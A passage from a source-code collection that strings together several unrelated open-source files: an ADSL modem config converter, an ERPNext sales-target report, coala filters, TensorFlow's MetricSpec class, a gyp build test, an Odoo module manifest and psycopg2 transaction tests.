print 'Usage: trml2txt input.rml >output.pdf'
print 'Try \'trml2txt --help\' for more information.'
| agpl-3.0 |
dadcup18/cm11_kernel_samsung_codinalte | Documentation/networking/cxacru-cf.py | 14668 | 1626 | #!/usr/bin/env python
# Copyright 2009 Simon Arlott
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Usage: cxacru-cf.py < cxacru-cf.bin
# Output: values string suitable for the sysfs adsl_config attribute
#
# Warning: cxacru-cf.bin with MD5 hash cdbac2689969d5ed5d4850f117702110
# contains mis-aligned values which will stop the modem from being able
# to make a connection. If the first and last two bytes are removed then
# the values become valid, but the modulation will be forced to ANSI
# T1.413 only which may not be appropriate.
#
# The original binary format is a packed list of le32 values.
import sys
import struct
i = 0
while True:
buf = sys.stdin.read(4)
if len(buf) == 0:
break
elif len(buf) != 4:
sys.stdout.write("\n")
sys.stderr.write("Error: read {0} not 4 bytes\n".format(len(buf)))
sys.exit(1)
if i > 0:
sys.stdout.write(" ")
sys.stdout.write("{0:x}={1}".format(i, struct.unpack("<I", buf)[0]))
i += 1
sys.stdout.write("\n")
| gpl-2.0 |
elba7r/lite-system | erpnext/selling/report/sales_person_target_variance_item_group_wise/sales_person_target_variance_item_group_wise.py | 16 | 6236 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _, msgprint
from frappe.utils import flt
from erpnext.accounts.utils import get_fiscal_year
from erpnext.controllers.trends import get_period_date_ranges, get_period_month_ranges
def execute(filters=None):
if not filters: filters = {}
columns = get_columns(filters)
period_month_ranges = get_period_month_ranges(filters["period"], filters["fiscal_year"])
sim_map = get_salesperson_item_month_map(filters)
data = []
for salesperson, salesperson_items in sim_map.items():
for item_group, monthwise_data in salesperson_items.items():
row = [salesperson, item_group]
totals = [0, 0, 0]
for relevant_months in period_month_ranges:
period_data = [0, 0, 0]
for month in relevant_months:
month_data = monthwise_data.get(month, {})
for i, fieldname in enumerate(["target", "achieved", "variance"]):
value = flt(month_data.get(fieldname))
period_data[i] += value
totals[i] += value
period_data[2] = period_data[0] - period_data[1]
row += period_data
totals[2] = totals[0] - totals[1]
row += totals
data.append(row)
return columns, sorted(data, key=lambda x: (x[0], x[1]))
def get_columns(filters):
for fieldname in ["fiscal_year", "period", "target_on"]:
if not filters.get(fieldname):
label = (" ".join(fieldname.split("_"))).title()
msgprint(_("Please specify") + ": " + label,
raise_exception=True)
columns = [_("Sales Person") + ":Link/Sales Person:120", _("Item Group") + ":Link/Item Group:120"]
group_months = False if filters["period"] == "Monthly" else True
for from_date, to_date in get_period_date_ranges(filters["period"], filters["fiscal_year"]):
for label in [_("Target") + " (%s)", _("Achieved") + " (%s)", _("Variance") + " (%s)"]:
if group_months:
label = label % (_(from_date.strftime("%b")) + " - " + _(to_date.strftime("%b")))
else:
label = label % _(from_date.strftime("%b"))
columns.append(label+":Float:120")
return columns + [_("Total Target") + ":Float:120", _("Total Achieved") + ":Float:120",
_("Total Variance") + ":Float:120"]
#Get sales person & item group details
def get_salesperson_details(filters):
return frappe.db.sql("""
select
sp.name, td.item_group, td.target_qty, td.target_amount, sp.distribution_id
from
`tabSales Person` sp, `tabTarget Detail` td
where
td.parent=sp.name and td.fiscal_year=%s order by sp.name
""", (filters["fiscal_year"]), as_dict=1)
#Get target distribution details of item group
def get_target_distribution_details(filters):
target_details = {}
for d in frappe.db.sql("""
select
md.name, mdp.month, mdp.percentage_allocation
from
`tabMonthly Distribution Percentage` mdp, `tabMonthly Distribution` md
where
mdp.parent=md.name and md.fiscal_year=%s
""", (filters["fiscal_year"]), as_dict=1):
target_details.setdefault(d.name, {}).setdefault(d.month, flt(d.percentage_allocation))
return target_details
#Get achieved details from sales order
def get_achieved_details(filters, sales_person, all_sales_persons, target_item_group, item_groups):
start_date, end_date = get_fiscal_year(fiscal_year = filters["fiscal_year"])[1:]
item_details = frappe.db.sql("""
select
sum(soi.qty * (st.allocated_percentage/100)) as qty,
sum(soi.base_net_amount * (st.allocated_percentage/100)) as amount,
st.sales_person, MONTHNAME(so.transaction_date) as month_name
from
`tabSales Order Item` soi, `tabSales Order` so, `tabSales Team` st
where
soi.parent=so.name and so.docstatus=1 and st.parent=so.name
and so.transaction_date>=%s and so.transaction_date<=%s
and exists(select name from `tabSales Person` where lft >= %s and rgt <= %s and name=st.sales_person)
and exists(select name from `tabItem Group` where lft >= %s and rgt <= %s and name=soi.item_group)
group by
sales_person, month_name
""",
(start_date, end_date, all_sales_persons[sales_person].lft, all_sales_persons[sales_person].rgt,
item_groups[target_item_group].lft, item_groups[target_item_group].rgt), as_dict=1)
actual_details = {}
for d in item_details:
actual_details.setdefault(d.month_name, frappe._dict({
"quantity" : 0,
"amount" : 0
}))
value_dict = actual_details[d.month_name]
value_dict.quantity += flt(d.qty)
value_dict.amount += flt(d.amount)
return actual_details
def get_salesperson_item_month_map(filters):
import datetime
salesperson_details = get_salesperson_details(filters)
tdd = get_target_distribution_details(filters)
item_groups = get_item_groups()
sales_persons = get_sales_persons()
sales_person_achievement_dict = {}
for sd in salesperson_details:
achieved_details = get_achieved_details(filters, sd.name, sales_persons, sd.item_group, item_groups)
for month_id in range(1, 13):
month = datetime.date(2013, month_id, 1).strftime('%B')
sales_person_achievement_dict.setdefault(sd.name, {}).setdefault(sd.item_group, {})\
.setdefault(month, frappe._dict({
"target": 0.0, "achieved": 0.0
}))
sales_target_achieved = sales_person_achievement_dict[sd.name][sd.item_group][month]
month_percentage = tdd.get(sd.distribution_id, {}).get(month, 0) \
if sd.distribution_id else 100.0/12
if (filters["target_on"] == "Quantity"):
sales_target_achieved.target = flt(sd.target_qty) * month_percentage / 100
else:
sales_target_achieved.target = flt(sd.target_amount) * month_percentage / 100
sales_target_achieved.achieved = achieved_details.get(month, frappe._dict())\
.get(filters["target_on"].lower())
return sales_person_achievement_dict
def get_item_groups():
item_groups = frappe._dict()
for d in frappe.get_all("Item Group", fields=["name", "lft", "rgt"]):
item_groups.setdefault(d.name, frappe._dict({
"lft": d.lft,
"rgt": d.rgt
}))
return item_groups
def get_sales_persons():
sales_persons = frappe._dict()
for d in frappe.get_all("Sales Person", fields=["name", "lft", "rgt"]):
sales_persons.setdefault(d.name, frappe._dict({
"lft": d.lft,
"rgt": d.rgt
}))
return sales_persons
| gpl-3.0 |
svsn2117/coala | coalib/parsing/StringProcessing/Filters.py | 23 | 1331 | def limit(iterator, count):
"""
A filter that removes all elements behind the set limit.
:param iterator: The iterator to be filtered.
:param count: The iterator limit. All elements at positions bigger than
this limit are trimmed off. Exclusion: 0 or numbers below
does not limit at all, means the passed iterator is
completely yielded.
"""
if count <= 0: # Performance branch
for elem in iterator:
yield elem
else:
for elem in iterator:
yield elem
count -= 1
if count == 0:
break
def trim_empty_matches(iterator, groups=(0,)):
"""
A filter that removes empty match strings. It can only operate on iterators
whose elements are of type MatchObject.
:param iterator: The iterator to be filtered.
:param groups: An iteratable defining the groups to check for blankness.
Only results are not yielded if all groups of the match
are blank.
You can not only pass numbers but also strings, if your
MatchObject contains named groups.
"""
for elem in iterator:
if any(len(elem.group(group)) > 0 for group in groups):
yield elem
| agpl-3.0 |
Where-No-Man-Has-Gone-Before/OWL-Predator-KERNEL_BAK | Documentation/networking/cxacru-cf.py | 14668 | 1626 | #!/usr/bin/env python
# Copyright 2009 Simon Arlott
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Usage: cxacru-cf.py < cxacru-cf.bin
# Output: values string suitable for the sysfs adsl_config attribute
#
# Warning: cxacru-cf.bin with MD5 hash cdbac2689969d5ed5d4850f117702110
# contains mis-aligned values which will stop the modem from being able
# to make a connection. If the first and last two bytes are removed then
# the values become valid, but the modulation will be forced to ANSI
# T1.413 only which may not be appropriate.
#
# The original binary format is a packed list of le32 values.
import sys
import struct
i = 0
while True:
buf = sys.stdin.read(4)
if len(buf) == 0:
break
elif len(buf) != 4:
sys.stdout.write("\n")
sys.stderr.write("Error: read {0} not 4 bytes\n".format(len(buf)))
sys.exit(1)
if i > 0:
sys.stdout.write(" ")
sys.stdout.write("{0:x}={1}".format(i, struct.unpack("<I", buf)[0]))
i += 1
sys.stdout.write("\n")
| gpl-2.0 |
llhe/tensorflow | tensorflow/contrib/learn/python/learn/metric_spec.py | 16 | 16381 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The metric spec class to flexibly connect models and metrics."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import tf_inspect
def _assert_named_args(sentinel):
if sentinel is not None:
raise ValueError(
'`metric_fn` requires named args: '
'`labels`, `predictions`, and optionally `weights`.')
def _args(fn):
"""Get argument names for function-like object.
Args:
fn: Function, or function-like object (e.g., result of `functools.partial`).
Returns:
`tuple` of string argument names.
"""
if hasattr(fn, 'func') and hasattr(fn, 'keywords'):
# Handle functools.partial and similar objects.
return tuple([
arg for arg in tf_inspect.getargspec(fn.func).args
if arg not in set(fn.keywords.keys())
])
# Handle function.
return tuple(tf_inspect.getargspec(fn).args)
_CANONICAL_LABELS_ARG = 'labels'
_LABELS_ARGS = set((_CANONICAL_LABELS_ARG, 'label', 'targets', 'target'))
_CANONICAL_PREDICTIONS_ARG = 'predictions'
_PREDICTIONS_ARGS = set((_CANONICAL_PREDICTIONS_ARG, 'prediction',
'logits', 'logit'))
_CANONICAL_WEIGHTS_ARG = 'weights'
_WEIGHTS_ARGS = set((_CANONICAL_WEIGHTS_ARG, 'weight'))
def _matching_arg(
fn_name, fn_args, candidate_args, canonical_arg, is_required=False):
"""Find single argument in `args` from `candidate_args`.
Args:
fn_name: Function name, only used for error string.
fn_args: String argument names to `fn_name` function.
candidate_args: Candidate argument names to find in `args`.
canonical_arg: Canonical argument name in `candidate_args`. This is only
used to log a warning if a non-canonical match is found.
is_required: Whether function is required to have an arg in
`candidate_args`.
Returns:
String argument name if found, or `None` if not found.
Raises:
ValueError: if 2 candidates are found, or 0 are found and `is_required` is
set.
"""
assert canonical_arg in candidate_args # Sanity check.
matching_args = candidate_args.intersection(fn_args)
if len(matching_args) > 1:
raise ValueError(
'Ambiguous arguments %s, must provide only one of %s.' % (
matching_args, candidate_args))
matching_arg = matching_args.pop() if matching_args else None
if matching_arg:
if matching_arg != canonical_arg:
logging.warning(
'Canonical arg %s missing from %s(%s), using %s.',
canonical_arg, fn_name, fn_args, matching_arg)
elif is_required:
raise ValueError(
'%s missing from %s(%s).' % (candidate_args, fn_name, fn_args))
return matching_arg
def _fn_name(fn):
if hasattr(fn, '__name__'):
return fn.__name__
if hasattr(fn, 'func') and hasattr(fn.func, '__name__'):
return fn.func.__name__ # If it's a functools.partial.
return str(fn)
def _adapt_metric_fn(
metric_fn, metric_fn_name, is_labels_required, is_weights_required):
"""Adapt `metric_fn` to take only named args.
This returns a function that takes only named args `labels`, `predictions`,
and `weights`, and invokes `metric_fn` according to the following rules:
- If `metric_fn` args include exactly one of `_LABELS_ARGS`, that arg is
passed (usually by name, but positionally if both it and `predictions` need
to be passed positionally). Otherwise, `labels` are omitted.
- If `metric_fn` args include exactly one of `_PREDICTIONS_ARGS`, that arg is
passed by name. Otherwise, `predictions` are passed positionally as the
first non-label argument.
- If exactly one of `_WEIGHTS_ARGS` is provided, that arg is passed by
name.
Args:
metric_fn: Metric function to be wrapped.
metric_fn_name: `metric_fn` name, only used for logging.
is_labels_required: Whether `labels` is a required arg.
is_weights_required: Whether `weights` is a required arg.
Returns:
Function accepting only named args `labels, `predictions`, and `weights`,
and passing those to `metric_fn`.
Raises:
ValueError: if one of the following is true:
- `metric_fn` has more than one arg of `_LABELS_ARGS`, `_PREDICTIONS_ARGS`,
or `_WEIGHTS_ARGS`
- `is_labels_required` is true, and `metric_fn` has no arg from
`_LABELS_ARGS`.
- `is_weights_required` is true, and `metric_fn` has no arg from
`_WEIGHTS_ARGS`.
"""
args = _args(metric_fn)
labels_arg = _matching_arg(
metric_fn_name, args, _LABELS_ARGS, _CANONICAL_LABELS_ARG,
is_labels_required)
predictions_arg = _matching_arg(
metric_fn_name, args, _PREDICTIONS_ARGS, _CANONICAL_PREDICTIONS_ARG)
weights_arg = _matching_arg(
metric_fn_name, args, _WEIGHTS_ARGS, _CANONICAL_WEIGHTS_ARG,
is_weights_required)
# pylint: disable=invalid-name
if labels_arg:
if predictions_arg:
# Both labels and predictions are named args.
def _named_metric_fn(
_sentinel=None, labels=None, predictions=None, weights=None):
_assert_named_args(_sentinel)
kwargs = {
labels_arg: labels,
predictions_arg: predictions,
}
if weights is not None:
kwargs[weights_arg] = weights
return metric_fn(**kwargs)
return _named_metric_fn
if labels_arg == args[0]:
# labels is a named arg, and first. predictions is not a named arg, so we
# want to pass it as the 2nd positional arg (i.e., the first non-labels
# position), which means passing both positionally.
def _positional_metric_fn(
_sentinel=None, labels=None, predictions=None, weights=None):
_assert_named_args(_sentinel)
# TODO(ptucker): Should we support metrics that take only labels?
# Currently, if you want streaming mean of a label, you have to wrap it
# in a fn that takes discards predictions.
if weights is None:
return metric_fn(labels, predictions)
return metric_fn(labels, predictions, **{weights_arg: weights})
return _positional_metric_fn
# labels is a named arg, and not first, so we pass predictions positionally
# and labels by name.
def _positional_predictions_metric_fn(
_sentinel=None, labels=None, predictions=None, weights=None):
_assert_named_args(_sentinel)
kwargs = {
labels_arg: labels,
}
if weights is not None:
kwargs[weights_arg] = weights
return metric_fn(predictions, **kwargs)
return _positional_predictions_metric_fn
if predictions_arg:
# No labels, and predictions is named, so we pass the latter as a named arg.
def _named_no_labels_metric_fn(
_sentinel=None, labels=None, predictions=None, weights=None):
del labels
_assert_named_args(_sentinel)
kwargs = {
predictions_arg: predictions,
}
# TODO(ptucker): Should we allow weights with no labels?
if weights is not None:
kwargs[weights_arg] = weights
return metric_fn(**kwargs)
return _named_no_labels_metric_fn
# Neither labels nor predictions are named, so we just pass predictions as the
# first arg.
def _positional_no_labels_metric_fn(
_sentinel=None, labels=None, predictions=None, weights=None):
del labels
_assert_named_args(_sentinel)
if weights is None:
return metric_fn(predictions)
# TODO(ptucker): Should we allow weights with no labels?
return metric_fn(predictions, **{weights_arg: weights})
return _positional_no_labels_metric_fn
class MetricSpec(object):
"""MetricSpec connects a model to metric functions.
The MetricSpec class contains all information necessary to connect the
output of a `model_fn` to the metrics (usually, streaming metrics) that are
used in evaluation.
It is passed in the `metrics` argument of `Estimator.evaluate`. The
`Estimator` then knows which predictions, labels, and weight to use to call a
given metric function.
When building the ops to run in evaluation, `Estimator` will call
`create_metric_ops`, which will connect the given `metric_fn` to the model
as detailed in the docstring for `create_metric_ops`, and return the metric.
Example:
Assuming a model has an input function which returns inputs containing
(among other things) a tensor with key "input_key", and a labels dictionary
containing "label_key". Let's assume that the `model_fn` for this model
returns a prediction with key "prediction_key".
In order to compute the accuracy of the "prediction_key" prediction, we
would add
```
"prediction accuracy": MetricSpec(metric_fn=prediction_accuracy_fn,
prediction_key="prediction_key",
label_key="label_key")
```
to the metrics argument to `evaluate`. `prediction_accuracy_fn` can be either
a predefined function in metric_ops (e.g., `streaming_accuracy`) or a custom
function you define.
If we would like the accuracy to be weighted by "input_key", we can add that
as the `weight_key` argument.
```
"prediction accuracy": MetricSpec(metric_fn=prediction_accuracy_fn,
prediction_key="prediction_key",
label_key="label_key",
weight_key="input_key")
```
An end-to-end example is as follows:
```
estimator = tf.contrib.learn.Estimator(...)
estimator.fit(...)
_ = estimator.evaluate(
input_fn=input_fn,
steps=1,
metrics={
'prediction accuracy':
metric_spec.MetricSpec(
metric_fn=prediction_accuracy_fn,
prediction_key="prediction_key",
label_key="label_key")
})
```
"""
def __init__(self,
metric_fn,
prediction_key=None,
label_key=None,
weight_key=None):
"""Constructor.
Creates a MetricSpec.
Args:
metric_fn: A function to use as a metric. See `_adapt_metric_fn` for
rules on how `predictions`, `labels`, and `weights` are passed to this
function. This must return either a single `Tensor`, which is
interpreted as a value of this metric, or a pair
`(value_op, update_op)`, where `value_op` is the op to call to
obtain the value of the metric, and `update_op` should be run for
each batch to update internal state.
prediction_key: The key for a tensor in the `predictions` dict (output
from the `model_fn`) to use as the `predictions` input to the
`metric_fn`. Optional. If `None`, the `model_fn` must return a single
tensor or a dict with only a single entry as `predictions`.
label_key: The key for a tensor in the `labels` dict (output from the
`input_fn`) to use as the `labels` input to the `metric_fn`.
Optional. If `None`, the `input_fn` must return a single tensor or a
dict with only a single entry as `labels`.
weight_key: The key for a tensor in the `inputs` dict (output from the
`input_fn`) to use as the `weights` input to the `metric_fn`.
Optional. If `None`, no weights will be passed to the `metric_fn`.
"""
self._metric_fn_name = _fn_name(metric_fn)
self._metric_fn = _adapt_metric_fn(
metric_fn=metric_fn,
metric_fn_name=self._metric_fn_name,
is_labels_required=label_key is not None,
is_weights_required=weight_key is not None)
self._prediction_key = prediction_key
self._label_key = label_key
self._weight_key = weight_key
@property
def prediction_key(self):
return self._prediction_key
@property
def label_key(self):
return self._label_key
@property
def weight_key(self):
return self._weight_key
@property
def metric_fn(self):
"""Metric function.
This function accepts named args: `predictions`, `labels`, `weights`. It
returns a single `Tensor` or `(value_op, update_op)` pair. See `metric_fn`
constructor argument for more details.
Returns:
Function, see `metric_fn` constructor argument for more details.
"""
return self._metric_fn
def __str__(self):
return ('MetricSpec(metric_fn=%s, ' % self._metric_fn_name +
'prediction_key=%s, ' % self.prediction_key +
'label_key=%s, ' % self.label_key +
'weight_key=%s)' % self.weight_key
)
def create_metric_ops(self, inputs, labels, predictions):
"""Connect our `metric_fn` to the specified members of the given dicts.
This function will call the `metric_fn` given in our constructor as follows:
```
metric_fn(predictions[self.prediction_key],
labels[self.label_key],
weights=weights[self.weight_key])
```
And returns the result. The `weights` argument is only passed if
`self.weight_key` is not `None`.
`predictions` and `labels` may be single tensors as well as dicts. If
`predictions` is a single tensor, `self.prediction_key` must be `None`. If
`predictions` is a single element dict, `self.prediction_key` is allowed to
be `None`. Conversely, if `labels` is a single tensor, `self.label_key` must
be `None`. If `labels` is a single element dict, `self.label_key` is allowed
to be `None`.
Args:
inputs: A dict of inputs produced by the `input_fn`
labels: A dict of labels or a single label tensor produced by the
`input_fn`.
predictions: A dict of predictions or a single tensor produced by the
`model_fn`.
Returns:
The result of calling `metric_fn`.
Raises:
ValueError: If `predictions` or `labels` is a single `Tensor` and
`self.prediction_key` or `self.label_key` is not `None`; or if
`self.label_key` is `None` but `labels` is a dict with more than one
element, or if `self.prediction_key` is `None` but `predictions` is a
dict with more than one element.
"""
def _get_dict(name, dict_or_tensor, key):
"""Get a single tensor or an element of a dict or raise ValueError."""
if key:
if not isinstance(dict_or_tensor, dict):
raise ValueError('MetricSpec with ' + name + '_key specified'
' requires ' +
name + 's dict, got %s.\n' % dict_or_tensor +
'You must not provide a %s_key if you ' % name +
'only have a single Tensor as %ss.' % name)
if key not in dict_or_tensor:
raise KeyError(
'Key \'%s\' missing from %s.' % (key, dict_or_tensor.keys()))
return dict_or_tensor[key]
else:
if isinstance(dict_or_tensor, dict):
if len(dict_or_tensor) != 1:
raise ValueError('MetricSpec without specified ' + name + '_key'
' requires ' + name + 's tensor or single element'
' dict, got %s' % dict_or_tensor)
return six.next(six.itervalues(dict_or_tensor))
return dict_or_tensor
# Get the predictions.
prediction = _get_dict('prediction', predictions, self.prediction_key)
# Get the labels.
label = _get_dict('label', labels, self.label_key)
try:
return self.metric_fn(
labels=label,
predictions=prediction,
weights=inputs[self.weight_key] if self.weight_key else None)
except Exception as ex:
logging.error('Could not create metric ops for %s, %s.' % (self, ex))
raise
| apache-2.0 |
Godmaster49/mtasa-blue | vendor/google-breakpad/src/tools/gyp/test/mac/gyptest-xcode-gcc-clang.py | 254 | 1403 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that xcode-style GCC_... settings that require clang are handled
properly.
"""
import TestGyp
import os
import sys
if sys.platform == 'darwin':
test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'])
CHDIR = 'xcode-gcc'
test.run_gyp('test-clang.gyp', chdir=CHDIR)
test.build('test-clang.gyp', 'aliasing_yes', chdir=CHDIR)
test.run_built_executable('aliasing_yes', chdir=CHDIR, stdout="1\n")
test.build('test-clang.gyp', 'aliasing_no', chdir=CHDIR)
test.run_built_executable('aliasing_no', chdir=CHDIR, stdout="0\n")
# The default behavior changed: strict aliasing used to be off, now it's on
# by default. The important part is that this is identical for all generators
# (which it is). TODO(thakis): Enable this once the bots have a newer Xcode.
#test.build('test-clang.gyp', 'aliasing_default', chdir=CHDIR)
#test.run_built_executable('aliasing_default', chdir=CHDIR, stdout="1\n")
# For now, just check the generated ninja file:
if test.format == 'ninja':
contents = open(test.built_file_path('obj/aliasing_default.ninja',
chdir=CHDIR)).read()
if 'strict-aliasing' in contents:
test.fail_test()
test.pass_test()
| gpl-3.0 |
ncliam/serverpos | openerp/addons/website_forum/__openerp__.py | 321 | 1905 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Forum',
'category': 'Website',
'summary': 'Forum, FAQ, Q&A',
'version': '1.0',
'description': """
Ask questions, get answers, no distractions
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/community-builder',
'depends': [
'auth_signup',
'gamification',
'website_mail',
'website_partner'
],
'data': [
'data/forum_data.xml',
'views/forum.xml',
'views/res_users.xml',
'views/website_forum.xml',
'views/ir_qweb.xml',
'security/ir.model.access.csv',
'data/badges_question.xml',
'data/badges_answer.xml',
'data/badges_participation.xml',
'data/badges_moderation.xml',
],
'qweb': [
'static/src/xml/*.xml'
],
'demo': [
'data/forum_demo.xml',
],
'installable': True,
'application': True,
}
| agpl-3.0 |
Amechi101/concepteur-market-app | venv/lib/python2.7/site-packages/psycopg2/tests/test_transaction.py | 62 | 9214 | #!/usr/bin/env python
# test_transaction - unit test on transaction behaviour
#
# Copyright (C) 2007-2011 Federico Di Gregorio <fog@debian.org>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import threading
from testutils import unittest, ConnectingTestCase, skip_before_postgres
import psycopg2
from psycopg2.extensions import (
ISOLATION_LEVEL_SERIALIZABLE, STATUS_BEGIN, STATUS_READY)
class TransactionTests(ConnectingTestCase):
def setUp(self):
ConnectingTestCase.setUp(self)
self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
curs = self.conn.cursor()
curs.execute('''
CREATE TEMPORARY TABLE table1 (
id int PRIMARY KEY
)''')
# The constraint is set to deferrable for the commit_failed test
curs.execute('''
CREATE TEMPORARY TABLE table2 (
id int PRIMARY KEY,
table1_id int,
CONSTRAINT table2__table1_id__fk
FOREIGN KEY (table1_id) REFERENCES table1(id) DEFERRABLE)''')
curs.execute('INSERT INTO table1 VALUES (1)')
curs.execute('INSERT INTO table2 VALUES (1, 1)')
self.conn.commit()
def test_rollback(self):
# Test that rollback undoes changes
curs = self.conn.cursor()
curs.execute('INSERT INTO table2 VALUES (2, 1)')
# Rollback takes us from BEGIN state to READY state
self.assertEqual(self.conn.status, STATUS_BEGIN)
self.conn.rollback()
self.assertEqual(self.conn.status, STATUS_READY)
curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2')
self.assertEqual(curs.fetchall(), [])
def test_commit(self):
# Test that commit stores changes
curs = self.conn.cursor()
curs.execute('INSERT INTO table2 VALUES (2, 1)')
# Rollback takes us from BEGIN state to READY state
self.assertEqual(self.conn.status, STATUS_BEGIN)
self.conn.commit()
self.assertEqual(self.conn.status, STATUS_READY)
# Now rollback and show that the new record is still there:
self.conn.rollback()
curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2')
self.assertEqual(curs.fetchall(), [(2, 1)])
def test_failed_commit(self):
# Test that we can recover from a failed commit.
# We use a deferred constraint to cause a failure on commit.
curs = self.conn.cursor()
curs.execute('SET CONSTRAINTS table2__table1_id__fk DEFERRED')
curs.execute('INSERT INTO table2 VALUES (2, 42)')
# The commit should fail, and move the cursor back to READY state
self.assertEqual(self.conn.status, STATUS_BEGIN)
self.assertRaises(psycopg2.IntegrityError, self.conn.commit)
self.assertEqual(self.conn.status, STATUS_READY)
# The connection should be ready to use for the next transaction:
curs.execute('SELECT 1')
self.assertEqual(curs.fetchone()[0], 1)
class DeadlockSerializationTests(ConnectingTestCase):
"""Test deadlock and serialization failure errors."""
def connect(self):
conn = ConnectingTestCase.connect(self)
conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
return conn
def setUp(self):
ConnectingTestCase.setUp(self)
curs = self.conn.cursor()
# Drop table if it already exists
try:
curs.execute("DROP TABLE table1")
self.conn.commit()
except psycopg2.DatabaseError:
self.conn.rollback()
try:
curs.execute("DROP TABLE table2")
self.conn.commit()
except psycopg2.DatabaseError:
self.conn.rollback()
# Create sample data
curs.execute("""
CREATE TABLE table1 (
id int PRIMARY KEY,
name text)
""")
curs.execute("INSERT INTO table1 VALUES (1, 'hello')")
curs.execute("CREATE TABLE table2 (id int PRIMARY KEY)")
self.conn.commit()
def tearDown(self):
curs = self.conn.cursor()
curs.execute("DROP TABLE table1")
curs.execute("DROP TABLE table2")
self.conn.commit()
ConnectingTestCase.tearDown(self)
def test_deadlock(self):
self.thread1_error = self.thread2_error = None
step1 = threading.Event()
step2 = threading.Event()
def task1():
try:
conn = self.connect()
curs = conn.cursor()
curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE")
step1.set()
step2.wait()
curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE")
except psycopg2.DatabaseError, exc:
self.thread1_error = exc
step1.set()
conn.close()
def task2():
try:
conn = self.connect()
curs = conn.cursor()
step1.wait()
curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE")
step2.set()
curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE")
except psycopg2.DatabaseError, exc:
self.thread2_error = exc
step2.set()
conn.close()
# Run the threads in parallel. The "step1" and "step2" events
# ensure that the two transactions overlap.
thread1 = threading.Thread(target=task1)
thread2 = threading.Thread(target=task2)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
# Exactly one of the threads should have failed with
# TransactionRollbackError:
self.assertFalse(self.thread1_error and self.thread2_error)
error = self.thread1_error or self.thread2_error
self.assertTrue(isinstance(
error, psycopg2.extensions.TransactionRollbackError))
def test_serialisation_failure(self):
self.thread1_error = self.thread2_error = None
step1 = threading.Event()
step2 = threading.Event()
def task1():
try:
conn = self.connect()
curs = conn.cursor()
curs.execute("SELECT name FROM table1 WHERE id = 1")
curs.fetchall()
step1.set()
step2.wait()
curs.execute("UPDATE table1 SET name='task1' WHERE id = 1")
conn.commit()
except psycopg2.DatabaseError, exc:
self.thread1_error = exc
step1.set()
conn.close()
def task2():
try:
conn = self.connect()
curs = conn.cursor()
step1.wait()
curs.execute("UPDATE table1 SET name='task2' WHERE id = 1")
conn.commit()
except psycopg2.DatabaseError, exc:
self.thread2_error = exc
step2.set()
conn.close()
# Run the threads in parallel. The "step1" and "step2" events
# ensure that the two transactions overlap.
thread1 = threading.Thread(target=task1)
thread2 = threading.Thread(target=task2)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
# Exactly one of the threads should have failed with
# TransactionRollbackError:
self.assertFalse(self.thread1_error and self.thread2_error)
